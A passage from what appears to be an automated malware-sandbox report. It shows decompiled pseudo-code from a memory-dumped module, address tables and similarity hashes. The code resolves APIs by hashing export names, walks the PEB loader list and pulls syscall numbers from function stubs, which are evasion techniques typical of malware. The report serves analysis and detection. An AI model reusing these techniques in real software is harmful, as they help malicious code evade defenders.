												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x1001934f
0x10019353
0x1001935f
0x10019363
0x10019367
0x1001936c
0x1001936f
0x10019371
0x10019373
0x10019373
0x10019376
0x1001937c
0x100193f4
0x100193f8
0x100193fb
0x100193fb
0x100193fe
0x00000000
0x100193fe
0x10019383
0x100193eb
0x100193ef
0x00000000
0x100193ef
0x1001938a
0x100193e3
0x100193e6
0x00000000
0x100193e6
0x1001938f
0x100193cd
0x100193d4
0x100193d7
0x100193a0
0x100193a0
0x100193a6
0x00000000
0x00000000
0x100193ab
0x100193c5
0x100193c8
0x00000000
0x100193c8
0x100193b0
0x00000000
0x100193b2
0x100193b6
0x100193b9
0x00000000
0x100193b9
0x100193b0
0x10019401
0x10019401
0x10019401
0x1001940a
0x10019413
0x10019416
0x10019419
0x1001941c
0x1001941f
0x10019425
0x10019467
0x1001946a
0x1001946b
0x10019472
0x10019475
0x10019427
0x1001942b
0x10019435
0x1001943c
0x1001943e
0x10019457
0x1001945a
0x1001945a
0x1001943c
0x1001947d
0x10019480
0x10019483
0x10019487
0x1001948b
0x10019495
0x10019499
0x100194a3
0x100194ac
0x100194b9
0x100194bc
0x100194bf
0x100194bf
0x100194cb
0x100194d6
0x100194dc
0x100194e0
0x100194cd
0x100194cd
0x100194cd
0x100194e8
0x10019512
0x10019518
0x10019518
0x10019520
0x100198c9
0x100198cf
0x100198d5
0x100198d5
0x00000000
0x10019526
0x10019526
0x1001952a
0x1001952d
0x10019530
0x10019533
0x10019537
0x10019539
0x1001953c
0x1001953f
0x10019543
0x10019548
0x1001954b
0x1001954f
0x10019554
0x10019557
0x10019559
0x1001955c
0x10019560
0x10019565
0x10019575
0x1001957b
0x1001957b
0x10019583
0x10019585
0x1001958e
0x10019590
0x10019593
0x1001959e
0x100195cb
0x100195a0
0x100195b7
0x100195b7
0x100195d3
0x100195d9
0x100195df
0x100195df
0x100195d3
0x1001958e
0x100195e6
0x10019657
0x1001965c
0x100196b5
0x10019777
0x1001977c
0x1001978b
0x10019791
0x10019795
0x1001979e
0x100197a5
0x100197ae
0x100197bc
0x100197bf
0x100197a7
0x100197a7
0x100197a7
0x100197a5
0x100197c8
0x100197f5
0x10019808
0x10019810
0x100197f7
0x100197f9
0x10019801
0x10019801
0x100197ca
0x100197cf
0x100197ee
0x100197d1
0x100197d6
0x100197e7
0x100197d8
0x100197d8
0x100197d8
0x100197d6
0x100197cf
0x10019818
0x10019827
0x10019834
0x1001983d
0x10019841
0x10019845
0x10019848
0x1001984b
0x1001984e
0x10019851
0x10019854
0x1001985a
0x1001985e
0x10019864
0x10019864
0x1001985a
0x1001986a
0x100198a7
0x100198ab
0x100198b2
0x100198b8
0x1001986c
0x1001986f
0x1001988f
0x10019893
0x1001989a
0x100198a1
0x10019871
0x10019874
0x10019876
0x1001987a
0x10019884
0x1001988a
0x1001988a
0x10019874
0x1001986f
0x100198bf
0x100198bf
0x100198d8
0x100198d8
0x100198de
0x100198e3
0x1001993d
0x10019942
0x10019981
0x10019986
0x10019988
0x1001998c
0x1001998f
0x10019992
0x10019994
0x10019995
0x10019995
0x1001999a
0x100199b8
0x100199ba
0x100199be
0x100199c4
0x100199c7
0x100199c9
0x100199ca
0x100199ca
0x00000000
0x1001999c
0x1001999c
0x1001999c
0x100199a0
0x100199a6
0x100199a9
0x100199ab
0x100199ae
0x100199cd
0x100199cd
0x100199d4
0x100199ee
0x100199d6
0x100199d6
0x100199e2
0x100199e3
0x100199e6
0x100199e6
0x100199fc
0x100199fc
0x1001999a
0x10019947
0x10019955
0x1001996d
0x10019971
0x10019974
0x1001997a
0x1001997e
0x1001997e
0x00000000
0x1001997e
0x10019957
0x1001995b
0x10019961
0x10019961
0x10019967
0x00000000
0x10019967
0x10019949
0x1001994d
0x00000000
0x1001994d
0x100198e7
0x10019913
0x1001992b
0x1001992f
0x10019932
0x10019935
0x10019937
0x1001993a
0x10019915
0x10019915
0x10019919
0x1001991c
0x1001991f
0x10019922
0x10019925
0x10019925
0x00000000
0x10019913
0x100198ed
0x00000000
0x00000000
0x100198f3
0x100198f7
0x100198fd
0x10019900
0x10019903
0x10019906
0x00000000
0x10019906
0x1001977e
0x10019782
0x10019788
0x00000000
0x10019788
0x100196c0
0x100196d2
0x100196d7
0x10019742
0x00000000
0x00000000
0x10019749
0x1001976f
0x10019773
0x00000000
0x00000000
0x10019752
0x10019757
0x1001976b
0x00000000
0x00000000
0x00000000
0x1001976d
0x1001975e
0x00000000
0x00000000
0x10019763
0x00000000
0x00000000
0x10019765
0x00000000
0x10019749
0x100196d9
0x100196e3
0x100196f4
0x100196f7
0x100196fa
0x10019700
0x00000000
0x00000000
0x00000000
0x00000000
0x10019706
0x10019706
0x10019706
0x1001970d
0x00000000
0x00000000
0x1001970f
0x10019712
0x10019718
0x00000000
0x00000000
0x00000000
0x1001971a
0x1001971c
0x10019725
0x00000000
0x00000000
0x10019739
0x00000000
0x00000000
0x00000000
0x1001973b
0x100196c7
0x00000000
0x00000000
0x00000000
0x100196cd
0x10019661
0x10019690
0x10019691
0x1001969a
0x00000000
0x100196ab
0x00000000
0x100196ab
0x10019668
0x1001966b
0x1001967e
0x1001967f
0x10019683
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1001966b
0x10019661
0x100195ed
0x1001964a
0x1001964e
0x10019654
0x00000000
0x10019654
0x100195ef
0x100195f3
0x10019600
0x10019604
0x1001961a
0x10019622
0x10019606
0x10019608
0x10019612
0x10019612
0x10019628
0x10019631
0x10019648
0x00000000
0x00000000
0x00000000
0x10019648
0x10019633
0x10019633
0x00000000
0x10019628

Strings

, xrefs: 100199B3

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 78ded7ad58ccfe6e39af61f505e9c63cd873381c8b4d26e632723182d8e82be7
Instruction ID: 40addf1f47f77ce90969db43eb15dc0c4582e7f707f2120123862ccb300b72ca
Opcode Fuzzy Hash: 78ded7ad58ccfe6e39af61f505e9c63cd873381c8b4d26e632723182d8e82be7
Instruction Fuzzy Hash: A922893080C7998BE729CF15C49136ABBE0FF86340F14886EE9D65F291D335DA85DB92

Uniqueness

Uniqueness Score: -1.00%

Function 10011460, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E10011460(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E10010328(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x1001d208 == 0 ||  *0x1001d2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0x7af3da47;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E10014FD4( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x1001d2ec |  *0x1001d2ed;
									if(( *0x1001d2ec |  *0x1001d2ed) == 0) {
										_t525 =  *0x1001d208; // 0x24907d0
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x1001d2ec = 1;
											_t526 = E100135F4(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E10011C54(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x1001d208 = _t526;
											 *0x1001d2ec = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E100135F4(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E10011C54(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E1000DFF8(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E1000DFF8(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t208 = _t525 + 0x1c0; // 0x24b6f68
										_t257 =  *_t208;
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t209 = _t257 + 0x1c0; // 0x24c2dc0
											_t257 =  *_t209;
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x82fffbdc;
									if(_t535[0x54] == 0x82fffbdc) {
										 *0x1001d20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0xdb278333;
										if(_t535[0x54] == 0xdb278333) {
											 *0x1001d210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E1000E8D4( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E10013044(0xfe338407, 0xccbfc9a9, 0xfe338407, 0xfe338407);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x1001d2e4 = 1;
					E1000F5A8( &(_t535[0x38]), 0);
					E1000F5A8( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E1000F4E0( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E10013044(0xfe338407, 0x790529cb, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E1000F84C( &(_t535[0xc]), E1000F4F0( &(_t535[8])) + 0x14);
								_t369 = E1000F4E0( &(_t535[0xc]), E1000F4F0( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E1000F678( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E1000F5A8( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E1000F678( &(_t535[8]));
							E1000F678( &(_t535[0x164]));
							E1000F5A8( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E1000F5A8( &(_t535[0x20]), 0);
							_push(0xfe338407);
							_t289 = E10011D58(0xfe338407);
							_t290 = E10011310( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E10011C90( &(_t535[0x164]), 0xfe338407);
							_t518 =  &(_t535[0x178]);
							E1000D058( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E10015CAC( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E10015CE0( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E10018DE0( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E1000F678( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E1000BB88( &(_t535[0x110]));
							}
							E1000D020( &(_t535[0x104]));
							E1000D020(_t518);
							E1000D020( &(_t535[0x15c]));
							E1000D020( &(_t535[0x154]));
							E100190C4( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E1000F63C( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E10019088( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E1000F4E0( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E1000F4F0( &(_t535[0x44]));
								_t519 =  *(0x1001bd40 + _t381 * 4);
								_t531 = E10019054( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E100187C0( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E1000F4F0( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E1000F500( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E1000F4F0( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E1000F84C( &(_t535[0x20]), E1000F4F0( &(_t535[0x1c])) + 8);
										E1000F4E0( &(_t535[0x20]), E1000F4F0( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E10013154(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E1000F84C( &(_t535[0x48]), _t535[0x70]);
									E10013154(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E1000F864( &(_t535[0x44]), _t563);
									E1000F864( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E10019114( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E100190DC( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E1000F678( &(_t535[0x144]));
									E1000F678( &(_t535[0x134]));
									goto L38;
								}
								 *0x1001d2e8 =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E1000F678( &(_t535[0x11c]));
							E10018E40(_t381,  &(_t535[0xd8]));
							E1000F678( &(_t535[0x1c]));
							E1000F678( &(_t535[0x44]));
							E1000F678( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E1000F4E0( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E1000F84C( &(_t535[0x38]), E1000F4F0( &(_t535[0x34])) + 0x14);
							_t347 = E1000F4E0( &(_t535[0x38]), E1000F4F0( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E1000F4E0( &(_t535[0xc]), _t62);
						_t455 = E1000F4E0( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x1001146c
0x10011473
0x10011476
0x1001147d
0x10011bff
0x10011bff
0x10011483
0x1001148e
0x100119cd
0x100119d1
0x00000000
0x10011c50
0x100119d7
0x100119da
0x100119dd
0x100119e7
0x100119f6
0x100119f8
0x100119ff
0x10011be9
0x10011beb
0x10011bee
0x10011bf2
0x00000000
0x10011bf2
0x10011a0e
0x10011a19
0x10011a20
0x10011a23
0x10011a25
0x10011a28
0x10011a2b
0x10011a31
0x10011a3f
0x10011a4f
0x10011a74
0x10011a85
0x10011a88
0x10011a8a
0x10011aee
0x10011af1
0x10011af1
0x10011af3
0x10011af6
0x10011afa
0x10011afa
0x10011afe
0x00000000
0x00000000
0x10011b0b
0x10011b11
0x10011b45
0x10011b4b
0x10011b4d
0x10011c1c
0x10011c24
0x10011c27
0x10011c29
0x10011c40
0x10011c40
0x10011c2b
0x10011c2f
0x10011c34
0x10011c34
0x10011c42
0x10011c48
0x10011b67
0x10011b67
0x10011b69
0x10011b69
0x10011b6b
0x10011b6b
0x10011b70
0x00000000
0x00000000
0x10011b72
0x10011b73
0x10011b76
0x10011b79
0x00000000
0x00000000
0x10011b85
0x10011b88
0x10011b8a
0x10011ba1
0x10011ba1
0x10011b8c
0x10011b90
0x10011b95
0x10011b95
0x10011bae
0x10011bb1
0x10011bba
0x10011bbd
0x10011be0
0x10011be4
0x00000000
0x10011be4
0x10011bc5
0x10011bc5
0x10011bd1
0x10011bd4
0x10011bdd
0x00000000
0x10011bdd
0x10011b53
0x10011b53
0x10011b63
0x10011b63
0x10011b65
0x00000000
0x00000000
0x10011b5b
0x10011b5d
0x10011b5d
0x10011b5d
0x00000000
0x10011b63
0x10011b13
0x10011b1b
0x10011b3b
0x10011b1d
0x10011b1d
0x10011b25
0x10011b2e
0x10011b2e
0x10011b25
0x00000000
0x10011b1b
0x10011a8c
0x10011a93
0x00000000
0x00000000
0x10011aa0
0x10011aa6
0x10011aab
0x10011ab2
0x10011ab6
0x10011acb
0x10011acd
0x10011acf
0x10011ad5
0x10011ae3
0x10011ae3
0x10011ae9
0x00000000
0x10011ae9
0x00000000
0x00000000
0x00000000
0x00000000
0x10011a33
0x10011a33
0x10011a33
0x10011a34
0x10011a37
0x10011a3b
0x00000000
0x10011a51
0x10011a54
0x10011a57
0x10011a60
0x10011a63
0x10011a64
0x10011a66
0x00000000
0x100114a1
0x100114a3
0x100114a8
0x100114b3
0x100114c1
0x100114d4
0x100114e1
0x100114ea
0x100114ee
0x100114f2
0x1001153a
0x1001153a
0x1001153c
0x10011543
0x00000000
0x00000000
0x1001155c
0x10011564
0x10011568
0x1001157d
0x10011581
0x10011585
0x1001158e
0x10011594
0x10011597
0x1001159b
0x100115a3
0x100115a5
0x100115a9
0x100115b0
0x100115b9
0x100115b9
0x100115bd
0x100115d2
0x100115e8
0x100115f5
0x100115f6
0x100115f6
0x100115f8
0x00000000
0x00000000
0x00000000
0x00000000
0x100115b2
0x100115b2
0x100115b2
0x100115b3
0x100115b4
0x00000000
0x100115b2
0x10011577
0x1001157b
0x00000000
0x00000000
0x00000000
0x100115fc
0x100115fc
0x100115fd
0x10011600
0x1001160a
0x1001160a
0x1001160e
0x10011615
0x10011670
0x10011675
0x100116c8
0x100116c8
0x100116cc
0x100116d0
0x100114fa
0x100114fd
0x10011502
0x10011508
0x1001150b
0x10011512
0x10011516
0x1001151d
0x10011526
0x1001152a
0x1001152e
0x10011534
0x00000000
0x00000000
0x00000000
0x10011534
0x100116da
0x100116e6
0x100116f1
0x100116f8
0x10011701
0x1001170b
0x1001170c
0x1001171a
0x1001171f
0x10011720
0x1001172d
0x10011732
0x10011744
0x10011749
0x1001174e
0x10011760
0x10011772
0x10011777
0x10011782
0x10011789
0x1001178e
0x10011796
0x1001179f
0x1001179f
0x100117ab
0x100117b2
0x100117be
0x100117ca
0x100117d8
0x100117e9
0x100117f0
0x100117f5
0x100117fe
